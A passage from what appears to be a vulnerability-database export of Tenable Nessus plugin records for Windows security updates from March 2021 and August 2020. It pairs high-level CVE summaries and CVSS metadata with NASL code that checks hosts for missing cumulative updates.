An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090, CVE-2021-24095, CVE-2021-26860, CVE-2021-26862, CVE-2021-26863, CVE-2021-26864, CVE-2021-26865, CVE-2021-26866, CVE-2021-26868, CVE-2021-26870, CVE-2021-26871, CVE-2021-26872, CVE-2021-26873, CVE-2021-26874, CVE-2021-26875, CVE-2021-26878, CVE-2021-26880, CVE-2021-26882, CVE-2021-26885, CVE-2021-26889, CVE-2021-26891, CVE-2021-26898, CVE-2021-26899, CVE-2021-26900, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26867, CVE-2021-26876, CVE-2021-26881, CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886)\n\n - A memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. 
An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-26892)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000808: Windows 10 Version 1909 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-1729", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-27077", "CVE-2021-27085"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000808.NASL", "href": "https://www.tenable.com/plugins/nessus/147220", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147220);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-1729\",\n \"CVE-2021-24090\",\n \"CVE-2021-24095\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26860\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26863\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26867\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26870\",\n \"CVE-2021-26871\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26874\",\n \"CVE-2021-26875\",\n \"CVE-2021-26876\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26885\",\n \"CVE-2021-26886\",\n \"CVE-2021-26889\",\n \"CVE-2021-26890\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26900\",\n \"CVE-2021-26901\",\n \"CVE-2021-27077\",\n \"CVE-2021-27085\"\n );\n script_xref(name:\"MSKB\", value:\"5000808\");\n script_xref(name:\"MSFT\", value:\"MS21-5000808\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000808: Windows 10 Version 1909 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000808.\nIt is, therefore, affected by multiple 
vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090,\n CVE-2021-24095, CVE-2021-26860, CVE-2021-26862,\n CVE-2021-26863, CVE-2021-26864, CVE-2021-26865,\n CVE-2021-26866, CVE-2021-26868, CVE-2021-26870,\n CVE-2021-26871, CVE-2021-26872, CVE-2021-26873,\n CVE-2021-26874, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26880, CVE-2021-26882, CVE-2021-26885,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26900, CVE-2021-26901,\n CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26867, CVE-2021-26876, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. 
An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000808-os-build-18363-1440-6989940a-252d-48f3-a2a7-a42bf19fa2c8\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8c6d108\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000808.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24090\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft 
Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000808'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000808])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:44", "description": "The remote Windows host is missing security update 5000822.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24095, CVE-2021-26860, CVE-2021-26862, CVE-2021-26863, CVE-2021-26864, CVE-2021-26865, CVE-2021-26866, CVE-2021-26868, CVE-2021-26870, CVE-2021-26872, CVE-2021-26873, CVE-2021-26874, CVE-2021-26875, CVE-2021-26878, CVE-2021-26880, CVE-2021-26882, CVE-2021-26889, CVE-2021-26891, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - A memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26876, CVE-2021-26877, CVE-2021-26881, CVE-2021-26890, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. 
An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-26892)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000822: Windows 10 Version 1809 and Windows Server 2019 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-1729", "CVE-2021-24095", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26886", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063", "CVE-2021-27077", "CVE-2021-27085"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000822.NASL", "href": "https://www.tenable.com/plugins/nessus/147223", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147223);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-1729\",\n \"CVE-2021-24095\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26860\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26863\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26870\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26874\",\n \"CVE-2021-26875\",\n \"CVE-2021-26876\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26886\",\n \"CVE-2021-26889\",\n \"CVE-2021-26890\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\",\n \"CVE-2021-27085\"\n );\n script_xref(name:\"MSKB\", value:\"5000822\");\n script_xref(name:\"MSFT\", value:\"MS21-5000822\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"KB5000822: Windows 10 Version 1809 and Windows Server 2019 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing 
security update 5000822.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24095,\n CVE-2021-26860, CVE-2021-26862, CVE-2021-26863,\n CVE-2021-26864, CVE-2021-26865, CVE-2021-26866,\n CVE-2021-26868, CVE-2021-26870, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26874, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26880, CVE-2021-26882,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26876, CVE-2021-26877, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-26893, CVE-2021-26894,\n CVE-2021-26895, CVE-2021-26897, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. 
An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000822-os-build-17763-1817-2eb6197f-e3b1-4f42-ab51-84345e063564\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1b432623\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000822.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26897\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is 
owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-03';\nvar kbs = make_list(\n '5000822'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000822])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-27T14:22:55", "description": "The remote Windows host is missing security update 4571702 or cumulative update 4571736. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system. 
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system (CVE-2020-1383)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. 
(CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1486)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. 
(CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-1565)\n\n - An elevation of privilege vulnerability exists when the Windows Remote Access improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. 
The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. 
(CVE-2020-1567)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - An elevation of privilege vulnerability exists when Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1562)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. 
In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571702: Windows Server 2012 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1464", "CVE-2020-1466", "CVE-2020-1467", "CVE-2020-1472", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1475", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1509", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1517", "CVE-2020-1518", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1529", "CVE-2020-1530", "CVE-2020-1537", "CVE-2020-1538", "CVE-2020-1554", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1567", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_AUG_4571736.NASL", "href": "https://www.tenable.com/plugins/nessus/139493", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
